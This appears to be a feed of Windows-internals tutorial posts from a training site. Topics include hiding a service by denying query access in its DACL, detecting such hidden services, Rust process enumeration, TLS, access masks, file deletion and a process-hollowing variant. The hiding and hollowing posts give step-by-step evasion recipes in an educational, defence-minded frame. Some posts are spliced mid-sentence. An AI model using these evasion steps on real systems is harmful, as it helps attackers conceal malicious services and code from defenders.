sc query.
A reasonable follow-up question is: how do you do the same thing programmatically?
This post shows one way to do it in C++ using the Windows security APIs. It’s not “hard,” but it is easy to get lost if you haven’t worked with security descriptors and ACLs before. The key is understanding what you’re modifying and what format it’s in.
A service has a security descriptor that controls who can do what with it. For our purposes, the important part is the DACL (Discretionary Access Control List).
The DACL contains ACEs (Access Control Entries). Each ACE is essentially:
To “hide” a service from standard enumeration, we deny the relevant “read/query” access to the principal doing the enumeration (for example, Administrators). The service can still exist and run; we’re just making it harder to query through the Service Control Manager (SCM) APIs.
If you want to reverse engineer what a tool is doing, start with Process Monitor.
When you change service permissions in Process Explorer, the actual change is not done by Process Explorer itself. The change is performed through the SCM, and you’ll see activity involving the service configuration in the registry.
You’ll find a key like:
HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Security
…and a value (often also named “Security”) that contains a binary blob. That blob is a security descriptor (it can be represented as SDDL text, but it’s stored as binary).
Important detail: editing the registry directly is not enough for immediate effect. The SCM does not necessarily re-read that value on every change. If you only edit the registry, the change may not apply until reboot. If you want it to take effect immediately, use the service security APIs.
Core service/security calls:
OpenSCManagerOpenServiceQueryServiceObjectSecuritySetServiceObjectSecuritySupporting security calls:
ConvertSecurityDescriptorToStringSecurityDescriptor (optional, for visibility/debugging)CreateWellKnownSid (for the Administrators SID)GetSecurityDescriptorDaclSetEntriesInAcl (build a new DACL that can grow)MakeAbsoluteSD (convert from self-relative to absolute)SetSecurityDescriptorDaclTypical flow:
OpenSCManager(nullptr, nullptr, SC_MANAGER_ALL_ACCESS)OpenService(hScm, serviceName, SERVICE_ALL_ACCESS)In theory you can request a smaller access mask. In practice, when you’re building/testing, using SERVICE_ALL_ACCESS avoids “access denied” surprises while you’re still wiring everything up.
Call QueryServiceObjectSecurity requesting DACL_SECURITY_INFORMATION.
You’ll typically call it once with a small/NULL buffer to get the required size, then allocate and call again.
At this point it’s useful to convert what you got to SDDL text, just so you can see what you’re working with. Use ConvertSecurityDescriptorToStringSecurityDescriptor. Remember to free the returned string with LocalFree.
Also: save a recovery path before you experiment. One simple option is:
sc sdshow <service> to capture the current SDDLsc sdset <service> <sddl> to restore it laterDo this in a VM if you can. Deny ACEs can lock you out in annoying ways.
Use CreateWellKnownSid(WinBuiltinAdministratorsSid, ...).
SIDs are variable length, so either size properly or just allocate a buffer of SECURITY_MAX_SID_SIZE and pass its size in/out.
The obvious approach is:
GetSecurityDescriptorDaclAddAccessDeniedAce to add a deny ACE (for GENERIC_READ against Administrators)This often fails with an error about allotted space / security information. That’s because the security descriptor returned by QueryServiceObjectSecurity is typically in self-relative form: a compact blob with offsets, not pointers, and there’s no spare room to grow the DACL inside that blob.
So you need to build a new DACL rather than trying to extend the existing one in-place.
Use SetEntriesInAcl with a single EXPLICIT_ACCESS entry:
DENY_ACCESSGENERIC_READ (good enough for the demo)SetEntriesInAcl returns an error code directly. If it fails, don’t waste time with GetLastError—use the returned error. If it succeeds, you now have newDacl that contains the original entries plus your new deny ACE.
You’ll typically free that allocated ACL later with LocalFree.
You might think you can just call:
SetSecurityDescriptorDacl(sd, TRUE, newDacl, FALSE)…and then SetServiceObjectSecurity.
But this can fail with Invalid security descriptor. The reason is the same theme: the original descriptor is self-relative, and you’re trying to attach pointers/structures in a way that doesn’t match the format.
The fix is to convert to absolute form first.
Use MakeAbsoluteSD to convert the descriptor from self-relative to absolute.
Absolute descriptors contain pointers to their components (owner, group, DACL, SACL). Once you have an absolute descriptor, attaching a new DACL works as expected.
So:
MakeAbsoluteSD)SetSecurityDescriptorDacl)SetServiceObjectSecurity)If everything worked, you’ll see the effect immediately: the service disappears from enumeration for callers that no longer have query/read access.ear” from Services.msc and sc query for callers that no longer have the needed query rights.
In real code, don’t forget to close handles and free allocations:
CloseServiceHandle for service/SCM handlesLocalFree for SDDL strings returned by conversion APIsLocalFree for ACLs allocated by SetEntriesInAclFor a short-lived demo program, the process exit will clean up memory, but it’s still good practice to do it properly.
This is a practical lesson in how Windows visibility depends on API paths and security descriptors, not just “what exists on disk.”
sc.exe enumerate services through the SCM and enforce the service DACL. If you can’t query it, it may not appear in your list at all.If you’re doing DFIR, threat hunting, or systems triage, the takeaway is simple: when tools disagree, don’t stop at “it isn’t there.” Ask which path the tool is using (SCM vs registry), and check the security descriptor when enumeration results don’t make sense.
For builders and researchers, this is also a good reminder that Windows security APIs can be unforgiving: self-relative vs absolute formats matter, and “I can’t append an ACE” often means “this structure can’t grow in-place,” not that the idea is wrong.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering. Subscribe for free and continue learning with us:
https://trainsec.net/library
In this post I’m looking at a simple Windows detail: a service can be running normally and still “disappear” from standard service enumeration. Nothing magical is happening. It’s just security. If a caller can’t query a service, the Service Control Manager (SCM) won’t show it to that caller.
Service configuration is stored in the system Registry under:
HKLM\SYSTEM\CurrentControlSet\Services
That key contains both services and device drivers (you can distinguish them using the Type value). Because services are registry-backed, many people assume that service visibility is purely a registry permission problem. That assumption is only sometimes true.
Services.msc (running inside MMC) uses the service control APIs to enumerate services. The same is true for sc.exe when you run commands like sc query.
Those APIs talk to the SCM’s internal database. They are not simply walking the Services registry key. And most importantly, enumeration is gated by access checks.
If the SCM can’t open a service with the access required for “read/query,” that service can drop out of the list for that caller. The service can still be running; you just won’t see it through the normal enumeration path.
A Windows service is an object managed by the SCM, and it has a security descriptor (with a DACL) that controls who can query it and manage it.
If the relevant query/read permissions are denied for your security context, standard enumeration won’t show the service. In the video I use Process Explorer as a convenient way to view and edit a service’s permissions. The important concept is the DACL, not the tool.
One reason this technique is confusing is that “hidden” does not mean “stopped.”
If you suspect a service is present but not visible through the usual UI, try to confirm it from a different angle:
The point is not that these tools are “better.” The point is that they’re giving you different views of the same system.
When service permissions block enumeration, you typically see:
sc query, the service doesn’t show up in the full list.That last point matters. “Not found” means the SCM can’t locate it. “Access denied” means the SCM found it, but you’re not allowed to query it.
A detail that surprises people is that this can happen even when you run the management tool “as administrator.”
Being elevated does not automatically mean you can query every service. The SCM evaluates the service’s DACL against your token, and explicit deny entries take precedence over allow entries. Windows even warns about this: deny ACEs are evaluated before allow ACEs.
There’s also a practical escape hatch: ownership. The owner of an object is in a privileged position and can recover access by changing the DACL. That’s why these changes are reversible if you still have sufficient rights.
Not every tool discovers services through the SCM APIs. Autoruns is a good example: it can enumerate services by reading the registry directly.
So a service that disappears from Services.msc can still appear in Autoruns, because Autoruns is looking at HKLM\SYSTEM\CurrentControlSet\Services rather than relying on SCM enumeration.
This is the defensive lesson: don’t trust a single enumeration path.
Enumerate services via the SCM APIs (Services.msc, sc.exe, PowerShell), and separately enumerate the Services registry key. A service present in the registry but missing from SCM results is a strong signal that permissions (or corruption) are involved.
Look for nonstandard DACLs, especially explicit deny entries against principals that normally have query access. Comparing against a known-good baseline for similar services on the same OS build is usually faster than guessing.
Pay attention to the difference between:
That distinction alone often tells you whether you’re dealing with visibility/permissions versus a missing service.
Windows visibility depends on access checks, and different tools see different slices of the system depending on which APIs they use.
When tools disagree, don’t stop at “it isn’t there.” Ask what path the tool is using (SCM APIs or Registry) and what permissions that path requires.ion cleanly, it’s a short step to building more advanced tooling.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering. Subscribe for free and continue learning with us:
https://trainsec.net/library
In this post I’m going to show how to get started with Windows system programming in Rust. The assumption is that you know a bit of Rust already, but I’ll keep the Rust-specific parts simple and focus on what changes when you start calling Win32 APIs.
The example I’m going to build is a classic: enumerate processes using the Toolhelp APIs (CreateToolhelp32Snapshot, Process32First, Process32Next). It’s simple enough to be a first project, but it forces us to deal with the key topics: crates, features, unsafe, error handling, and UTF-16 strings.
Rust’s safety guarantees apply to safe Rust: you don’t get use-after-free bugs, garbled pointers, or the usual memory hazards that come from manual lifetime management. But the moment you start interacting with an operating system API that was designed for C, you’re going to cross into unsafe territory.
That’s not a Rust limitation. It’s just reality: the OS APIs are mostly C-style interfaces. Rust can’t prove at compile time that you’re using them correctly, so you explicitly mark the call site as unsafe. Think of it as telling the compiler: “I’m taking responsibility for this part.”4).
windows-sys vs windowsFor Windows specifically, you have a few options in the ecosystem, but Microsoft maintains two crates that matter here:
windows-sys: low-level bindings, close to the raw Win32 types and functions.windows: higher-level wrappers built on top of windows-sys, generally more ergonomic for Rust code.For this example, I use the windows crate. It still exposes the Win32 calls, but it’s a better starting point if you want code that feels like Rust rather than a direct mechanical translation of C headers.
Start a new executable project:
cargo new (I call the sample project ProcList)Most people use VS Code with the Rust Analyzer plugin, which is fine. I’m using RustRover from JetBrains in the video, but the tooling choice isn’t the point—Cargo and the crate setup are what matter.
You’ll see two things immediately:
Cargo.toml (your project metadata and dependencies)main.rs (the default “Hello world”)Add the windows crate to Cargo.toml. The key detail is features.
Win32 is huge. You do not want to enable everything. The correct approach is to enable the minimal set of modules you actually use.
For Toolhelp process enumeration, you’ll need the module that contains the Toolhelp APIs, and typically you’ll also need Foundation types.
A practical tip: don’t guess feature names. Use the windows-rs documentation tooling that maps API names to features. If you search for a function like CreateToolhelp32Snapshot, it tells you which feature to enable. This saves time, and it avoids the “why won’t this import compile?” loop.
Once you import the right modules, you can start calling Win32.
The first Toolhelp call is CreateToolhelp32Snapshot.
Two things you’ll notice immediately:
unsafe { ... }. That’s normal, as these are C APIs, which are unsafe by definition.GetLastError after every step, many of the bindings surface results as Rust Result<> values.For a first demo, it’s common to use unwrap() to keep the example focused. That means: if something fails, crash and show the error. For production code, you’ll usually do proper error handling, but for learning the mechanics, unwrap() keeps the noise down.
The Toolhelp enumeration pattern is the same as in C and C++:
PROCESSENTRY32 structureProcess32FirstProcess32NextIn Rust, there are a few details you must get right.
On Windows, the “real” string API surface is UTF-16. For Toolhelp, that means using the wide types and functions:
PROCESSENTRY32WProcess32FirstWProcess32NextWThe process name field is a fixed-size UTF-16 buffer. If you print it naïvely, you’ll get a dump of numbers, not a readable name.
We’ll fix that in a minute.
Toolhelp functions require you to set dwSize to the size of the structure.
In C++ you often do something like:
dwSizeIn Rust, you can’t leave memory uninitialized. You typically start with a zeroed structure (or a default initializer provided by the bindings), then set:
entry.dwSize = size_of::<PROCESSENTRY32W>() as u32;If dwSize is wrong, enumeration fails. This is one of those Win32 rules you can’t ignore.
Rust variables are immutable by default.
If the API is going to write into your process entry structure, the structure must be declared with mut. The snapshot handle doesn’t necessarily need to be mutable, but the entry does.
This is a small Rust difference that matters when you translate Win32 patterns into Rust.
The executable name in PROCESSENTRY32W is a UTF-16 buffer. Rust natural strings are UTF-8.
A common and practical approach is:
StringFor example (conceptually):
String::from_utf16_lossy(&entry.szExeFile)'\0'That gives you a normal readable process name.
A small Rust feature that helps here is variable shadowing. You can reuse the same variable name for each transformation step (raw → string → trimmed) without mutating the original binding. It keeps the code readable.
At a high level, the logic looks like this:
dwSizeProcess32FirstW succeeds:
Process32NextW succeeds:The “Rust work” is mostly about correctness at the boundaries:
unsafe where requiredIf you do Windows Internals work, you end up writing small tools sooner or later. Sometimes it’s for debugging. Sometimes it’s for IR. Sometimes it’s for research or experiments.
Rust gives you a good balance:
unsafe blocksThis example is intentionally simple, but it builds the foundation you need for anything bigger:
windows crate properlyOnce you can do process enumeration cleanly, it’s a short step to building more advanced tooling.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering.Subscribe for free and continue learning with us:
https://trainsec.net/library
But that mindset misses the real power of the tool.
WinDbg is not just a debugger used in emergencies. It is one of the most powerful research tools available for understanding how Windows actually works. Microsoft engineers use it to debug the operating system itself. With the right setup and workflow, it becomes a microscope for exploring Windows internals.
On April 7th, 2026, I’ll be running a live 4-hour masterclass where we will use WinDbg specifically as a research platform for exploring Windows components.
This session is designed for Trainsec students who want to go beyond theory and develop practical techniques for investigating the system from the inside.

Registration, syllabus and more: https://trainsec.net/windows-research-with-windbg-live-4h/
During the session we will explore several practical areas:
The focus will be on real investigative workflows and techniques that can be applied when studying Windows internals, reverse engineering components, analyzing system behavior, or troubleshooting complex issues.
Many Trainsec courses dive deep into Windows internals, security research, reverse engineering, and malware analysis. WinDbg is one of the tools that ties these areas together.
If you know how to drive WinDbg effectively, you gain the ability to:
In short, WinDbg turns documentation and theory into observable reality.
The ticket for the event is $49, but the admission works a bit differently than a typical webinar.
Every ticket also includes a $49 voucher that can be used toward any course in the Trainsec catalog.
In other words, if you are planning to take a Trainsec course anyway, the ticket effectively becomes store credit you can use later.
Windows Research with WinDbg – Live Masterclass
Date: April 7, 2026
Time: 10:00 AM – 2:00 PM (EDT)
Duration: 4 hours (live session)
Seats: Limited
Admission: $49 (includes a $49 Trainsec course voucher)
If you want to get more comfortable using WinDbg as a research tool rather than a last-resort debugger, this session will give you the workflows and techniques to start doing that.
Register now to reserve your seat.
Registration, syllabus and more: https://trainsec.net/windows-research-with-windbg-live-4h/
]]>In this post, I’ll explain what TLS is, where you’ve already been using it (whether you noticed or not), and then I’ll show a practical use case: avoiding a nasty recursion problem when hooking an allocation API and trying to log allocations.
TLS is about storing information per thread, while keeping access uniform.
That means I can write code that says “get my TLS value,” and it will always return the value for the current thread. Another thread running the same code will read its own value, from its own storage, using the exact same access pattern.
The whole point is that each thread gets its own data, and threads don’t stomp on each other.
On Windows, you can think of TLS as an array of “slots” per thread:
Windows guarantees at least 64 TLS slots, and in practice you can go higher (up to 1024).
You’ve seen TLS patterns in both the C runtime and the Windows API.
errno And Other CRT “Globals”In old (and current) C code, errno is a global variable. In a multi-threaded process, that’s a data race waiting to happen. One thread calls (say) fopen, while another thread does some I/O, and suddenly your “last error” isn’t your last error anymore.
So modern CRT implementations make errno effectively thread-local. In practice, it’s accessed through a function (in Visual Studio you’ll see it as a macro calling an internal function), and that function returns the per-thread value.
The same idea applies to other classic CRT functions that need per-thread state, like strtok (which keeps internal state between calls). That state can’t safely be process-global in a multi-threaded world, so it ends up being thread-local.
GetLastError And The TEBOn the Windows side, GetLastError is another obvious example: it can’t be a single global variable either.
The value is stored per thread, and you can see it in the TEB (Thread Environment Block) in a debugger. Each thread has its own TEB, so each thread has its own “last error” value.
This is TLS in spirit: uniform access (“give me my last error”) with per-thread storage under the hood.
TLS is not just “a programming convenience.” It’s a mechanism you’ll run into when you’re:
The key mental model is: uniform access, thread-specific storage. Once that clicks, a lot of Windows behavior becomes easier to explain—and certain “impossible” problems (like passing state into a hooked function with no extra parameters) become straightforward.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering.Subscribe for free and continue learning with us:
https://trainsec.net/library
An access mask is one of those things that’s easy to ignore until something doesn’t work. A good example is when an API call fails with Access Denied, even though you think you have a valid handle. In many cases, the missing piece is simply that the handle doesn’t have the rights that specific call requires. So the goal here is to make access masks less mysterious and more observable.
An access mask is a compact way to represent access rights for an object. It’s a 32-bit value, where different bits have different meanings. Those bits represent what someone can do with the object.
Access masks typically show up in two locations:
So, the access mask is a core part of both “what access did I actually get on this handle?” and “what access is allowed according to the ACL?”
A quick way to see access masks on handles is Process Explorer. Pick any handle, and you’ll see each handle’s properties: the handle value, object type, object name (if it has one), and the Access column.
That Access value is the access mask—a set of bits corresponding to a 32-bit number. Since an access mask is just a number, you usually need Windows headers or documentation to translate it into something meaningful.
To make this easier, there’s also a Decoded Access column that shows the access mask in a readable form. That way, you don’t have to go hunting through headers every time you want to understand what a handle can actually do.
For example:
Another useful example is a registry key handle opened with READ_CONTROL and KEY_READ only. If code tries to write to that registry key using this handle, it will fail with Access Denied, because the handle simply doesn’t have write permissions.
One detail that trips people up: if you double-click a handle in Process Explorer, the dialog you get is about the object, not about the handle. The handle-specific access is what you see in the handle list itself.
Another view is the classic Windows security dialog (for example, via the Security tab and then Advanced).
In the Advanced view you’ll see the list of ACEs. Each ACE is essentially a triplet:
Sometimes the UI shows “Special.” That doesn’t mean it’s unusual—it usually means there isn’t a single neat label for that exact combination of bits. If you click Edit or View, you can see the detailed permissions behind that entry (including things like delete, change permissions, change owner, and others).
You can also view the same information through a kernel debugger. The underlying idea is:
When I do this locally in a debugger, I can locate the object, then look at the object header structure. One practical detail is that the object header is 48 bytes before the object.
From there, you can grab the security descriptor pointer and use the !sd command to dump it. If you get an error related to flags, one fix is to zero out the last digit of the address—on 64-bit Windows, object addresses are 16-byte aligned, so the lower four bits are always zero.
Once you dump the security descriptor, you’ll see the ACEs listed with SIDs and access masks (in a more raw form). The ordering and identities match what you see in the Security UI, but here you’ll also see the numeric masks directly.
A 32-bit access mask includes several categories of rights:
The lower 16 bits are specific rights, and these depend on the object type. A process has different specific rights than a file, thread, desktop, and so on. There can be no more than 16 object-specific bits.
There are also standard rights that apply broadly across object types:
Ownership matters because the owner always has a certain level of control—objects should not become permanently inaccessible due to a bad DACL. And if you have the Take Ownership privilege (administrators typically do by default), you can change the owner even without having “write owner” granted through the normal access bits.
SYNCHRONIZE is the right to wait on an object. It only makes sense for objects where “signaled” has meaning (processes, threads, events, mutexes, semaphores, and similar). A process, for example, becomes signaled when it terminates.
MAXIMUM_ALLOWED means “give me the maximum access I can get without failing.” Whether that’s enough for what you want to do depends on your use case.
Finally, there are generic rights:
These are translated behind the scenes into object-specific rights. One way to see what they translate to is by looking at object-type mappings in Object Explorer (for example, for process objects: generic read maps to a specific set of rights such as VM read and query information).
In general, if you’re doing programming work, I recommend being explicit rather than using generic rights. Generic rights can request more than you actually need—and if you ask for more than you need, you may end up getting nothing.
Let’s say you want to terminate a process. You call OpenProcess, and the first parameter is the desired access mask—what you want to be able to do if the call succeeds.
A lazy approach is to request PROCESS_ALL_ACCESS. That’s usually a bad idea:
If your goal is termination, you should request PROCESS_TERMINATE. If you also want to wait for the process to actually terminate, add SYNCHRONIZE.
Now here’s the catch: if you then try to call GetProcessTimes using that handle, it will fail with Access Denied. Why? Because GetProcessTimes requires PROCESS_QUERY_INFORMATION or PROCESS_QUERY_LIMITED_INFORMATION, and you didn’t ask for that access—so you don’t have it in this handle.
The fix isn’t “use ALL_ACCESS.” The fix is to request exactly what you need:
That’s the larger point: the access mask stored in the handle directly controls what you can successfully do with it.
Access masks show up everywhere once you start paying attention. They’re in the handles you open, and they’re in the ACEs that decide who gets what access.
If you can read access masks, you stop guessing:
That’s a practical skill in Windows internals work, and it also shows up in security contexts where you’re trying to understand what a process can actually do with the objects it has open.
If you want more material like this, browse the free TrainSec Knowledge Library:
https://trainsec.net/library/
And if you’re following along, try inspecting access masks in two places for the same system: a handle view (Process Explorer) and an ACE view (Security → Advanced). Seeing both perspectives is usually where the concept clicks.
]]>How do you delete a file in Windows? looks like a beginner question, but it’s a great excuse to peel back the layers and see what Windows is really doing.
At the surface, you can just open File Explorer and delete a file. But if you’re studying Windows internals, the interesting part is what happens behind the scenes: which APIs are used, what flags matter, and how you can prove it with the right tooling.
In Explorer, there’s an important difference:
So if your question is “how do I permanently delete a Windows file?” in the everyday Explorer sense (i.e., don’t send it to the Recycle Bin), Shift+Delete is the key.
There are plenty of tools you can use:
del command in a Command PromptRemoveItemDeleteFileSHFileOperation (more flexible — for example, deleting directories that contain files)Different entry points… but internally, file deletion comes down to a small set of mechanisms.
In reality, there are two ways to delete a file in Windows.
The first way is:
CreateFile or a native API like NtOpenFile)CloseHandle)This is a clean model: open the file with the right flag, then close the handle, and the deletion happens.
The second way is used when the file is already open and you decide you want to delete it:
SetFileInformationByHandleFileDispositionInformation (or the extended version)If you’ve done any kernel driver work, this aligns with IRP_MJ_SET_INFORMATION being sent down to the file system driver.
To figure out what a tool is doing (what del does, what DeleteFile does, what anything does), you need visibility.
That’s where Process Monitor (ProcMon) from Sysinternals comes in.
A simple workflow:
test1.txtOne thing you’ll notice right away: even typing in Command Prompt can trigger file activity, because of auto-complete. You may see a CreateFile with read-style access before you even run the delete command. That’s normal background behaviour — it’s not the deletion yet.
When you actually run del test1.txt, ProcMon makes it very clear what’s happening.
You’ll see a CreateFile where:
That tells you del is using the first mechanism:
It’s simple — and very effective.
Next, I wrote a tiny program that just calls DeleteFile and passes in the filename (argv[1]). The deletion works, but the mechanism is different.
In ProcMon you’ll see:
CreateFile with DELETE accessSo it has to use the other mechanism — and you can see it directly:
If you open the call stack in ProcMon, you can literally follow it:
DeleteFileDeleteFile calls NtSetInformationFileOn this version of Windows, DeleteFile is implemented using the disposition information approach.
If you enable Advanced Output in ProcMon, you can see the major function codes directly, which makes the mental model even cleaner:
Once you see those three in context, file deletion stops being mysterious.
Now that you’ve got the model, you can apply it to anything:
RemoveItem in PowerShellSHFileOperationThe point is: you don’t need to guess. You can verify exactly what’s happening.
For TrainSec students, this example is important not because deleting a file is hard, but because it forces you to build a real mental model of Windows behaviour below the surface.
A lot of people learn Windows behaviour as a loose checklist of APIs. That approach hides the mechanics. In this deletion walkthrough, the mechanics are the whole lesson: there are two core deletion paths, access rights matter, and you can validate everything by watching the real operations (create, close, set-information) as they happen.
This is exactly the kind of thinking TrainSec is designed to train: stop treating Windows as a black box, and start reasoning about it based on what the system is actually doing.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals.
Subscribe for free and continue learning with us: https://trainsec.net/library/.
]]>Process hollowing is usually described as creating a process in a suspended state, removing its original executable image, and replacing it with a different one. From the outside, the process appears normal, but the code running inside is not what you expect.
In this article, I explore a slightly different idea.
Instead of unmapping the original executable, we leave it in place. The original image stays mapped in memory, inactive but present. We then map a second executable into the same process and redirect execution to it. The result is a process that still looks legitimate when inspected at a high level, while actually running different code.
The flow looks like this:
First, an attacker process creates a target process in a suspended state. At this point, only the original image and NTDLL are mapped, and no user code has executed yet.
Next, memory is allocated inside the target process for a replacement executable. The executable is rebased to match the allocated address, avoiding the need for a full manual loader.
The rebased image is then mapped and copied into the target process, including headers and all sections. For simplicity, all memory is marked as execute, read, and write, even though this is not ideal from a stealth perspective.
After that, the Process Environment Block is updated so the loader sees the correct image base. The entry point is written into the suspended thread context, and the thread is resumed.
At this point, the original executable image is still present in memory, but it is dormant. The replacement image is what actually runs.
This approach has clear limitations. Rebasing modifies the executable on disk. Memory protections are overly permissive. Error handling is minimal. Still, it is a useful experiment for understanding how process creation, image loading, and execution really work on Windows.
If you are interested in detection, evasion, or low level Windows internals, this kind of hands on exploration is valuable. The code is not the point. The mechanics are.
For TrainSec students, this example is important not because it is a perfect injection technique, but because it forces you to understand how Windows really works below the surface.
Many people learn process hollowing as a checklist of API calls. That approach often hides the real mechanics. In this variant, you are exposed to the actual building blocks: how a process is created, how images are mapped, how the PE structure is laid out in memory, how the loader relies on the PEB, and how execution flow is controlled through thread context.
This kind of understanding is critical for several roles.
For malware researchers, it shows why small changes in loading behavior can break assumptions made by static and dynamic analysis tools.
For detection and EDR engineers, it highlights why relying only on classic hollowing patterns is not enough. The original image is still present, memory layout looks mostly normal, and execution happens elsewhere.
For reverse engineers, it provides a concrete example of how loaders, rebasing, and section mapping interact, which helps when debugging crashes, unpacking malware, or analyzing custom loaders.
For exploit developers and low level Windows developers, it reinforces the idea that Windows APIs are only part of the story. The real behavior depends on internal structures like the PEB, NT headers, and thread state.
TrainSec courses focus on building this mental model. Once you understand these internals, techniques like hollowing, injection, and evasion stop being magic tricks and start becoming engineering problems you can reason about, improve, and detect.
This is exactly the gap TrainSec aims to close.
This content is part of the free TrainSec Knowledge Library, where students can deepen their understanding of Windows internals, malware analysis, and reverse engineering.Subscribe for free and continue learning with us: https://trainsec.net/library
In a recent discussion between Yaniv Hoffman and me, a core idea came back again and again: strong defense in cybersecurity starts with understanding the attacker’s mindset. Malware analysis, EDR evasion, and modern attack chains cannot be learned only from theory or from a single defensive angle. They require thinking across roles and understanding how real attackers operate in practice.
This approach is at the heart of how I teach and research malware, and it is highly relevant for students and researchers learning at TrainSec Academy.
I explained that effective defenders must learn to think like attackers. To detect and stop real threats, you need to understand why attackers choose certain techniques, how they bypass security tools, and where defenders usually make assumptions.
Malware analysis sits between blue and red teams. By reversing malware and studying real tradecraft, defenders learn how attackers reuse code, copy techniques from known ransomware groups, and adapt quickly. This is not theory. It is exactly how attackers learn from each other in the real world.
For TrainSec students, this means that malware analysis is not just about reading indicators or signatures. It is about understanding intent, design decisions, and abuse of legitimate system behavior.
One of the strongest points raised in the discussion is that attackers often succeed by using very simple methods. Instead of advanced shellcode or complex loaders, many attacks rely on trusted, signed system tools that defenders ignore.
I demonstrated how built in Windows utilities can be abused to fully compromise Active Directory by dumping the NTDS database. No custom malware, no suspicious API calls, and no obvious indicators. From an EDR point of view, everything looks like a normal administrative action.
This highlights a critical lesson for security researchers and SOC analysts: if you only look for complex behavior, you will miss the attacks that matter most.
The discussion also covers how malware has changed in recent years:
For TrainSec students, these trends explain why learning internals, operating systems, and detection logic is essential. Tools change, but attacker thinking patterns stay consistent.
This philosophy aligns directly with the learning paths at TrainSec, where students are guided step by step from fundamentals to advanced research topics.
This discussion reflects how TrainSec approaches cybersecurity education. Courses are designed to teach how systems really work, how attackers abuse them, and how defenders can respond with informed detection and prevention.
For students and researchers, this mindset helps bridge the gap between theory and real world security work. It prepares them not only to detect threats, but to understand them deeply and adapt as attackers evolve.
I appreciate Yaniv Hofman for hosting me for this great discussion. Check out his youtube channel here:
]]>In a recent panel of industry experts convened at the annual Data Centers & Cloud 2025 event, we explored how data‑centres and cloud infrastructures are preparing for the AI era and why the sleep‑at‑night factor may be under threat for many organizations.
As AI and data‑intensive workloads move to the fore, traditional data‑centre and cloud infrastructure are under unprecedented pressure. The panel, which included cloud and cyber‑security leaders from government, healthcare and enterprise, examined how legacy installation, hybrid models, regulation, infrastructure scaling, and the human factor combine to create a volatile mix.
In the AI‑era, the data‑centre is no longer a simple physical facility. It is a dynamic hybrid ecosystem of compute, cloud services, accelerators, and identity flows. Security leaders cannot sleep soundly but with the right architecture and mindset, they can stay ahead of the threat curve.
Based on a panel discussion at Data Centers & Cloud 2025 and the original Hebrew article published by PC.co.il.
]]>